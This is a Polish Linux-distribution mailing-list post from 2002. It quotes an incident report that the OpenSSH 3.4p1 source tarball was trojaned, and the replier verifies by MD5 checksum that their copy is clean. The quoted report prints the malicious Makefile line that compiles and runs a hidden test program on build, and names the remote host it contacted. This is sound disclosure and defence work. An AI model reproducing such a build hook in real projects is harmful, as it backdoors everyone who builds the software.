security, informacyjnie
Blues
blues w ds6.pg.gda.pl
Czw, 1 Sie 2002, 12:27:57 CEST
On Thu, 1 Aug 2002, Piotr Meyer wrote:
> Co prawda nie mamy chyba tej wersji, ale jeśli ktoś eksperymentuje,
> to w ramach ostrzeżenia podsyłam:
Mamy tą wersję w cvs
> Date: Thu, 1 Aug 2002 16:55:51 +1000
> From: Edwin Groothuis <edwin w mavetju.org>
> To: incidents w securityfocus.com
> Subject: openssh-3.4p1.tar.gz trojaned
> Just want to inform you that the OpenSSH package op ftp.openbsd.org
> (and probably all its mirrors now) it trojaned:
>
>
> ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz
>
> The OpenBSD people have been informed about it (via email to
> deraadt w openbsd.org and via irc.openprojects.org/#openbsd)
>
>
> The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
> all: libopenbsd-compat.a
> + @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh
> ./bf-test.out &
>
> bf-test.c[1] is nothing more than a wrapper which generates a
> shell-script[2] which compiles itself and tries to connect to an
> server running on 203.62.158.32:6667 (web.snsonline.net).
>
> [1] http://www.mavetju.org/~edwin/bf-test.c
> [2] http://www.mavetju.org/~edwin/bf-output.sh
>
> This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
> ports system:
> MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8
>
> This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
> MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
$ md5sum ~/rpm/SOURCES/openssh-3.4p1.tar.gz
459c1d0262e939d6432f193c7a4ba8a8 /home/users/blues/rpm/SOURCES/openssh-3.4p1.tar.gz
Więc jest ok.
--
---------------------------------
pozdr. Paweł Gołaszewski
---------------------------------
CPU not found - software emulation...
Więcej informacji o liście dyskusyjnej pld-devel-pl